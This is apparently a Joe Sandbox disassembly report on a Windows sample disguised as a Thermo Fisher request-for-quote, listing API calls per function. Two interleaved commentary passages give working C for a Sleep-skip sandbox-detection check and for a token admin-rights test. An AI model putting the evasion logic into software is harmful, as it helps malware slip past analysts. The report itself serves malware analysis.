                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: f396132fe469b4a11f279c6252ae308bb45988cea8305006f78ed3941cf92e83
                                                              • Instruction ID: de78d2a9002ce3f0b952aa048751fc7e5290fa6f7fc48f91edc993ca9b622f06
                                                              • Opcode Fuzzy Hash: f396132fe469b4a11f279c6252ae308bb45988cea8305006f78ed3941cf92e83
                                                              • Instruction Fuzzy Hash: CE31AE7190022DEBEF04CF68D94DADE7BB6EB04315F105229FA21AA2D1C3B09954CBA0
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0063DBD7
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0063DBF4
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0063DC2C
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0063DC52
                                                              • _wcsstr.LIBCMT ref: 0063DC5C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                              • String ID:
                                                              • API String ID: 3902887630-0
                                                              • Opcode ID: 7093f812397160a89c39772221217099529ec4e1452eeef936510dbb219cf9c7
                                                              • Instruction ID: f699949dd1792a4154784e870f6f2ec982fa339cbc9fdba9fef991882944d28c
                                                              • Opcode Fuzzy Hash: 7093f812397160a89c39772221217099529ec4e1452eeef936510dbb219cf9c7
                                                              • Instruction Fuzzy Hash: 24210771214104BBEB159B39AC49EBB7BAEDF45750F148129F809CA191EAA1CC41D7A4
                                                              APIs
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0063BC90
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0063BCC2
                                                              • __itow.LIBCMT ref: 0063BCDA
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0063BD00
                                                              • __itow.LIBCMT ref: 0063BD11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: dcc17f9f9a9afd18e8aae136163d0a157a0298ecc7a95dab8562d19addbe94eb
                                                              • Instruction ID: d5102957c8561224f883174ce9c8bbf86308afb4e6d8544f0fa73a644df7af08
                                                              • Opcode Fuzzy Hash: dcc17f9f9a9afd18e8aae136163d0a157a0298ecc7a95dab8562d19addbe94eb
                                                              • Instruction Fuzzy Hash: E821F671740218BADB20AB649C46FDF7BABAF49310F002028FA05EB1C1EB708D4587E5
                                                              APIs
                                                                • Part of subcall function 006050E6: _wcsncpy.LIBCMT ref: 006050FA
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,006460C3), ref: 00646369
                                                              • GetLastError.KERNEL32(?,?,?,006460C3), ref: 00646374
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006460C3), ref: 00646388
                                                              • _wcsrchr.LIBCMT ref: 006463AA
                                                                • Part of subcall function 00646318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006460C3), ref: 006463E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                              • String ID:
                                                              • API String ID: 3633006590-0
                                                              • Opcode ID: 97728a98df9a82986ec862b06c774fc06d50185b72be41a7bd816a4e9de2a75f
                                                              • Instruction ID: 6e6b1d6eb93db80fb6a6ea642001fad5b0112b66fdc7107dc9bcb2ac744f98a0
                                                              • Opcode Fuzzy Hash: 97728a98df9a82986ec862b06c774fc06d50185b72be41a7bd816a4e9de2a75f
                                                              • Instruction Fuzzy Hash: 332105315042559BDB26EF78EC52FEA23AFAF173A0F102069F045C31C1EF60DD858A6A
                                                              APIs
                                                                • Part of subcall function 0065A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0065A84E
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00658BD3
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658BE2
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00658BFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 3701255441-0
                                                              • Opcode ID: 53c059d608b6e63942747ba9137ad106d67256d0187f56c9b3d4caace11b1b7e
                                                              • Instruction ID: 01b93d657ed8e7a6e44569dca492bff134af34cab2ed9cf01d9987dc7fc0fbbb
                                                              • Opcode Fuzzy Hash: 53c059d608b6e63942747ba9137ad106d67256d0187f56c9b3d4caace11b1b7e
                                                              • Instruction Fuzzy Hash: CE21AE31200214AFCB54AF68CD85BBE77ABAF48721F04454DF946AB3D2CF74AC058B65
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 00658441
                                                              • GetForegroundWindow.USER32 ref: 00658458
                                                              • GetDC.USER32(00000000), ref: 00658494
                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 006584A0
                                                              • ReleaseDC.USER32(00000000,00000003), ref: 006584DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ForegroundPixelRelease
                                                              • String ID:
                                                              • API String ID: 4156661090-0
                                                              • Opcode ID: 09c778c52543e8ab8e76f7d94a54ce6c1e133915cb84a78d317372aadc632f6f
                                                              • Instruction ID: ab0349cc101116fac56ea321d1d4c0511afa6380985ea31c894e92a900121ec8
                                                              • Opcode Fuzzy Hash: 09c778c52543e8ab8e76f7d94a54ce6c1e133915cb84a78d317372aadc632f6f
                                                              • Instruction Fuzzy Hash: 83218175A00204AFDB44EFA4C889AAEBBE6EF48301F04857DE95997291DB70ED44CB64
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0061AFE3
                                                              • SelectObject.GDI32(?,00000000), ref: 0061AFF2
                                                              • BeginPath.GDI32(?), ref: 0061B009
                                                              • SelectObject.GDI32(?,00000000), ref: 0061B033
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: 9111b9e19505e68d1c267c1dbacda9b9edbc9d55ec6bbec40e45dee96235611f
                                                              • Instruction ID: b5e76eb34626ae3378a5f99d0d34d14f65d2ef465e672ec7f94c0e2a6dce232e
                                                              • Opcode Fuzzy Hash: 9111b9e19505e68d1c267c1dbacda9b9edbc9d55ec6bbec40e45dee96235611f
                                                              • Instruction Fuzzy Hash: C2217470800205EFDB10DF56EC48FEA7B6BBB16366F18631AF4259A2A1C3708995CB91
                                                              APIs
                                                              • __calloc_crt.LIBCMT ref: 006221A9
                                                              • CreateThread.KERNEL32(?,?,006222DF,00000000,?,?), ref: 006221ED
                                                              • GetLastError.KERNEL32 ref: 006221F7
                                                              • _free.LIBCMT ref: 00622200
                                                              • __dosmaperr.LIBCMT ref: 0062220B
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                              • String ID:
                                                              • API String ID: 2664167353-0
                                                              • Opcode ID: 60149dbce389cc949909832e148acbc7995fdcad4ef26d8e595f68e67a5d7908
                                                              • Instruction ID: 4c55f990695bf64f9aac86ecec20ca3dda316621cb6961faebe5690fc9c9c1d6
                                                              • Opcode Fuzzy Hash: 60149dbce389cc949909832e148acbc7995fdcad4ef26d8e595f68e67a5d7908
                                                              • Instruction Fuzzy Hash: EA110832105B27BF9B11AF65FC41DAB379BEF01770B10012DFA1486192DB32D8518FA5
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0063ABD7
                                                              • GetLastError.KERNEL32(?,0063A69F,?,?,?), ref: 0063ABE1
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,0063A69F,?,?,?), ref: 0063ABF0
                                                              • HeapAlloc.KERNEL32(00000000,?,0063A69F,?,?,?), ref: 0063ABF7
                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0063AC0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: 9fa0a124e96edf174b57ed4a48fc55a2eece41b74470d68c96c3affe50b656ec
                                                              • Instruction ID: fdab83fad906d31636503723fc3fdbc1b107c96144c08b3a4bf1313d795e0a39
                                                              • Opcode Fuzzy Hash: 9fa0a124e96edf174b57ed4a48fc55a2eece41b74470d68c96c3affe50b656ec
                                                              • Instruction Fuzzy Hash: 69013171200204BFDB105FA5DC48DAB3BAEFF8A755B101529F585C3290D671DC80DBB1
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647A74
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00647A82
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00647A8A
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00647A94
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00647AD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: 889677565f1a34c96e76c5270497ccd0fcb3222dd8caa03ca85324ca012943a7
                                                              • Instruction ID: 4b90ccfd6ea2e60fede601a5e41c89b5df4c36763e8260c0e837373804b6aed3
                                                              • Opcode Fuzzy Hash: 889677565f1a34c96e76c5270497ccd0fcb3222dd8caa03ca85324ca012943a7
                                                              • Instruction Fuzzy Hash: B6014C71D04619EBCF00AFE4DC4CADDBB7AFF08751F050595E942B2290DB30969487A5
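The function above brackets a Sleep with two QueryPerformanceCounter samples (plus one QueryPerformanceFrequency call to scale them), which is the classic way to notice that a sandbox or debugger has hooked Sleep to skip the delay while the high-resolution counter keeps honest time. The following C is an added illustration of the decision logic such a check implements; it is not code recovered from this sample or produced by Joe Sandbox. The counter values and the 10 MHz frequency are constructed so the block compiles and runs without the Windows API; on Windows the three inputs would come straight from the calls listed above.

```c
#include <stdint.h>
#include <stdio.h>

/* Milliseconds elapsed between two performance-counter samples.
 * freq is ticks per second, i.e. what QueryPerformanceFrequency reports. */
uint64_t qpc_elapsed_ms(uint64_t before, uint64_t after, uint64_t freq)
{
    if (freq == 0 || after < before)   /* bogus frequency or counter ran backwards */
        return 0;
    return (after - before) * 1000ULL / freq;
}

/* Returns 1 when a Sleep(requested_ms) bracketed by the two samples returned
 * early: the counter advanced by less than requested_ms minus a tolerance for
 * scheduler jitter. A sandbox that patches Sleep to return immediately but
 * leaves the performance counter alone produces exactly this signature. */
int sleep_was_skipped(uint64_t before, uint64_t after, uint64_t freq,
                      uint32_t requested_ms, uint32_t tolerance_ms)
{
    uint64_t elapsed  = qpc_elapsed_ms(before, after, freq);
    uint64_t floor_ms = requested_ms > tolerance_ms
                      ? (uint64_t)requested_ms - tolerance_ms : 0;
    return elapsed < floor_ms;
}

/* Constructed scenario: a 10 MHz counter and a requested Sleep(2000). */
#define SAMPLE_FREQ 10000000ULL
#define SAMPLE_T0   100000000ULL

/* Honest run: the counter advanced by 2.003 s across the Sleep. */
int demo_honest_sleep(void)
{
    return sleep_was_skipped(SAMPLE_T0, SAMPLE_T0 + 20030000ULL, SAMPLE_FREQ, 2000, 50);
}

/* Fast-forwarded run: the counter advanced by only 1.2 ms across the Sleep. */
int demo_patched_sleep(void)
{
    return sleep_was_skipped(SAMPLE_T0, SAMPLE_T0 + 12000ULL, SAMPLE_FREQ, 2000, 50);
}

int main(void)
{
    printf("honest sleep flagged:  %d\n", demo_honest_sleep());
    printf("patched sleep flagged: %d\n", demo_patched_sleep());
    return 0;
}
```

The check works because it compares two independent clocks; an analysis environment that wants to defeat it has to fast-forward the performance counter by the same amount it skips in Sleep, or let the delay run for real.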
                                                              APIs
                                                              • CLSIDFromProgID.OLE32 ref: 00639ADC
                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00639AF7
                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 00639B05
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00639B15
                                                              • CLSIDFromString.OLE32(?,?), ref: 00639B21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: c3458a85310b31c383185c33f31dda54a2cdc71de8b95bf23baad0a7f46ec223
                                                              • Instruction ID: cffa19ca8a651f5dea7b6bc48c96dbcca7e8b39a849217817080e7feaa6b3bef
                                                              • Opcode Fuzzy Hash: c3458a85310b31c383185c33f31dda54a2cdc71de8b95bf23baad0a7f46ec223
                                                              • Instruction Fuzzy Hash: 8C018BB6600208BFDB104F68EC44BAABBEEEF49392F148024F906D2250D7B0DD009BF0
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0063AA79
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0063AA83
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0063AA92
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0063AA99
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0063AAAF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 3c325de0cc9710fc9e7c0bb377d4a16e25539ad2d51f8ac9b4892db31f413910
                                                              • Instruction ID: a1522d42e5c4ba7ed8aab01bdf41fb6b780f3078f095491ae70c7bdd2e336a43
                                                              • Opcode Fuzzy Hash: 3c325de0cc9710fc9e7c0bb377d4a16e25539ad2d51f8ac9b4892db31f413910
                                                              • Instruction Fuzzy Hash: F6F044712002087FDB115FA4AC8DEAB3B6EFF49754F100619F981C7290D7619C41DB71
                                                              APIs
                                                               • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 0063AADA
                                                               • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 0063AAE4
                                                               • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 0063AAF3
                                                               • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 0063AAFA
                                                               • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 0063AB10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 2b3e5f1e3faa38083f1690e321078a0bd6e61850ad43eeea3b4049803aae9669
                                                              • Instruction ID: 5d5d35546272b2871ea156096c0dbfe11879ff534f085d020bf545b24d151f79
                                                              • Opcode Fuzzy Hash: 2b3e5f1e3faa38083f1690e321078a0bd6e61850ad43eeea3b4049803aae9669
                                                              • Instruction Fuzzy Hash: 08F044712002047FDB110FA4EC88EBB7B6EFF45754F100229F582C7290D66198019B71
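The two token functions above follow the standard GetTokenInformation sizing pattern: a first call with a zero-length buffer that fails with GetLastError set, a HeapAlloc of the reported size, then the real call. The first of them passes information class 2 (TokenGroups), which returns the list of group SIDs in the token together with their attribute flags. The C below is an added illustration, not code from this sample or from Joe Sandbox, of what a consumer of that buffer typically does with it: render each raw SID and decide whether BUILTIN\Administrators is effectively present. The SID byte layout and the SE_GROUP_* flag values are the real Windows ones; the token contents are constructed so the block runs without the Windows API, and the `group_entry` struct is a stand-in for the SID_AND_ATTRIBUTES array inside TOKEN_GROUPS.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Group attribute flags, values as defined in winnt.h. */
#define SE_GROUP_ENABLED           0x00000004u
#define SE_GROUP_USE_FOR_DENY_ONLY 0x00000010u

/* One group entry. Stand-in for SID_AND_ATTRIBUTES in the TOKEN_GROUPS buffer. */
typedef struct {
    const uint8_t *sid;   /* raw SID: Rev(1) Count(1) Authority(6, big-endian) SubAuth[Count] (little-endian) */
    size_t         len;
    uint32_t       attributes;
} group_entry;

/* Render a raw SID as "S-1-5-32-544". Returns 1 on success, 0 on malformed input. */
int sid_to_string(const uint8_t *sid, size_t len, char *out, size_t outlen)
{
    if (len < 8 || sid[0] != 1 || sid[1] > 15 || len < 8 + 4u * sid[1])
        return 0;
    uint64_t authority = 0;
    for (int i = 0; i < 6; i++)
        authority = (authority << 8) | sid[2 + i];
    int n = snprintf(out, outlen, "S-1-%llu", (unsigned long long)authority);
    if (n < 0 || (size_t)n >= outlen)
        return 0;
    for (unsigned i = 0; i < sid[1]; i++) {
        const uint8_t *p = sid + 8 + 4 * i;
        uint32_t sub = (uint32_t)p[0] | (uint32_t)p[1] << 8 |
                       (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
        int m = snprintf(out + n, outlen - n, "-%u", sub);
        if (m < 0 || (size_t)m >= outlen - n)
            return 0;
        n += m;
    }
    return 1;
}

/* "Effective admin" test: BUILTIN\Administrators must be present AND enabled.
 * A UAC-filtered (medium-integrity) token still lists the group, but flagged
 * USE_FOR_DENY_ONLY, so checking presence alone gives a false positive. */
int token_has_effective_admin(const group_entry *groups, size_t count)
{
    char buf[128];
    for (size_t i = 0; i < count; i++) {
        if (!sid_to_string(groups[i].sid, groups[i].len, buf, sizeof buf))
            continue;                               /* skip malformed entries */
        if (strcmp(buf, "S-1-5-32-544") != 0)
            continue;
        if (groups[i].attributes & SE_GROUP_USE_FOR_DENY_ONLY)
            return 0;
        return (groups[i].attributes & SE_GROUP_ENABLED) != 0;
    }
    return 0;
}

/* Constructed SID blobs; the encoding is the real on-disk/in-memory layout. */
static const uint8_t SID_ADMINISTRATORS[] = { 1, 2, 0,0,0,0,0,5, 32,0,0,0, 32,2,0,0 }; /* S-1-5-32-544 */
static const uint8_t SID_EVERYONE[]       = { 1, 1, 0,0,0,0,0,1, 0,0,0,0 };            /* S-1-1-0 */

/* Constructed token contents: what a UAC-filtered admin token looks like. */
int demo_filtered_token(void)
{
    group_entry groups[] = {
        { SID_EVERYONE,       sizeof SID_EVERYONE,       SE_GROUP_ENABLED },
        { SID_ADMINISTRATORS, sizeof SID_ADMINISTRATORS, SE_GROUP_USE_FOR_DENY_ONLY },
    };
    return token_has_effective_admin(groups, 2);
}

/* Constructed token contents: the elevated (linked) token of the same user. */
int demo_elevated_token(void)
{
    group_entry groups[] = {
        { SID_EVERYONE,       sizeof SID_EVERYONE,       SE_GROUP_ENABLED },
        { SID_ADMINISTRATORS, sizeof SID_ADMINISTRATORS, SE_GROUP_ENABLED },
    };
    return token_has_effective_admin(groups, 2);
}

int main(void)
{
    char buf[64];
    if (sid_to_string(SID_ADMINISTRATORS, sizeof SID_ADMINISTRATORS, buf, sizeof buf))
        printf("%s\n", buf);
    printf("filtered token admin: %d\n", demo_filtered_token());
    printf("elevated token admin: %d\n", demo_elevated_token());
    return 0;
}
```

The deny-only case is the one that matters when reading a report like this: a sample that merely scans TokenGroups for S-1-5-32-544 will believe it is an administrator under UAC and then fail on the first privileged operation, whereas one that also honours the attribute flags knows it has to elevate first.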
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0063EC94
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0063ECAB
                                                              • MessageBeep.USER32(00000000), ref: 0063ECC3
                                                              • KillTimer.USER32(?,0000040A), ref: 0063ECDF
                                                              • EndDialog.USER32(?,00000001), ref: 0063ECF9
